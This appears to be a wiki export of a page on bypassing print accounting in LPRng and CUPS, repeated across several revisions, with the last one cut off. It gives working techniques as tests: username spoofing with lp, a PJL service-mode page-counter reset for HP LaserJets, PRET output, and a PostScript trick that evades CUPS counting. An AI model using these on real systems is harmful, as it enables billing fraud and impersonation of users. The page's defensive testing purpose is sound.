Hacking Printers wiki http://hacking-printers.net/wiki/index.php/Main_Page MediaWiki 1.26.4 first-letter Media Special Talk User User talk Hacking Printers Hacking Printers talk File File talk MediaWiki MediaWiki talk Template Template talk Help Help talk Category Category talk 0 14 634 199 2017-06-25T11:31:30Z Admin 1 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Fundamentals#Network_printing_protocols|network printing protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: <syntaxhighlight lang=sh> lp -U nobody test.ps </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecount'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecount 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Anyone who forward jobs to the (CUPS based) print server. However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies. <!-- % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 5c24c6bf5d2deaeea656080e5d791fb718db0454 199 198 2017-01-23T13:08:17Z Admin 1 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: <syntaxhighlight lang=sh> lp -U nobody test.ps </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecount'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecount 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Anyone who forward jobs to the (CUPS based) print server. However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies. <!-- % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- e22346b534dbf9b08ab4a4dd47f531c2d11e2454 198 179 2017-01-23T13:08:04Z Admin 1 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: <syntaxhighlight lang=sh> lp -U nobody test.ps </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecount 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Anyone who forward jobs to the (CUPS based) print server. However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies. <!-- % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 4444fbf424fbd8ff50e628225ec4e59337ee7623 179 136 2017-01-21T11:47:42Z Admin 1 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: <syntaxhighlight lang=sh> lp -U nobody test.ps </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecounter 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Anyone who forward jobs to the (CUPS based) print server. However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies. <!-- % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 4fb3ebc96147eee1b1ae55dff867f567fd960d99 136 123 2017-01-14T20:02:25Z Admin 1 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: lp -U nobody test.ps '''Who can perform this attack?''' Anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing 